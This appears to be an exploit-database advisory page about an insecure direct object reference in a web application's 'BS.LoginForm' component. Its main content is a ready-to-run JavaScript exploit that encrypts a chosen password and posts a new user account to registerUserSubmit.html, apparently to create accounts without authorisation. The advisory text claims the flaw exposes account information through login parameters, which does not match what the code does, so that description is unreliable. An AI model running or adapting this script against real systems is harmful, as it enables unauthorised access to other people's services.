BS.LoginForm Insecure Direct Object Reference Vulnerability

vendor:

N/A

by:

Anonymous

8.8

CVSS

HIGH

Insecure Direct Object Reference

639

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

BS.LoginForm Insecure Direct Object Reference Vulnerability

This vulnerability allows an attacker to access the user's account information by manipulating the parameters of the login form. The code snippet contains a function that takes the user's login, password, and email address as parameters and sends them to the server. The parameters are then encrypted and sent to the server. The server then processes the request and returns a response. If the response is successful, the user is logged in. If the response is unsuccessful, an error message is displayed.

Mitigation:

The application should validate the user's input and ensure that the parameters are not manipulated. Additionally, the application should use secure authentication methods such as two-factor authentication.

Source

Exploit-DB raw data:

var login = 'testuser'; //логин пользователя
var password = 'SuperMEgaPa$$'; //пароль
var email = 'testusername654@mailinater.com'; // email
/* Code */
var b = BS.LoginForm;
var public_key = $F("publicKey");
var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey"));
var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass;
var c = OO.extend(BS.ErrorsAwareListener, {
            onDuplicateAccountError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onMaxNumberOfUserAccountsReachedError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onCreateUserError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onCompleteSave: function(c, d, b) {
                BS.ErrorsAwareListener.onCompleteSave(c, d, b);
                if (!b) {
                    BS.XMLResponse.processRedirect(d);
                }
            }
        });
BS.ajaxRequest("registerUserSubmit.html", {
                method: "post",
                parameters: parameters,
                onComplete: function(i) {
                    if (!i.responseXML) {
                        alert(i.responseText);
                    } else {
                        var h = i.responseXML;
                        var e = BS.XMLResponse.processErrors(h, c);
                        console.log(i.responseText);
                        c.onCompleteSave(b, h, e, i.responseText);
                    }
                },
                onFailure: function(i) {
                    console.log(i);
                },
                onException: function(i, h) {
                    console.log(i);
                }
            });